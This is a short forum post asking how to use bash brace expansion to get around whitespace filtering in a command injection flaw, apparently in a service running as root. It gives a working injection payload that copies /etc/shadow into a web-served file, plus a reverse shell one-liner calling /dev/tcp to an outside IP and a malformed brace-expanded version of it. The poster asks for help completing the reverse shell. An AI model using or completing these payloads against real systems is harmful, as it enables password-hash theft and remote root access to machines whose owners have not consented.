Does anyone have more experience with bash brace expansions when dealing with command injections that filters whitespaces?
I am encountering most likely not a filtering engine, but an bad parsing engine which has an command injection vulnerability as it is parsed to an system call.
I have successfully been able to write out
/etc/shadow
:
-w=target.cap;{cat,/etc/shadow}>>/var/www/passnew.txt
Which succeeded without further issues. The service is running as root as well.
At the moment I am trying to do an reverse shell with brace expansion, but I am encountering difficulties upon formatting the following one liner payload:
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
To
-w=target.cap;{bash,-i}>&{/dev/tcp/ipredacted/8080{0>&1}
I have tried more ways than this, but I am stuck.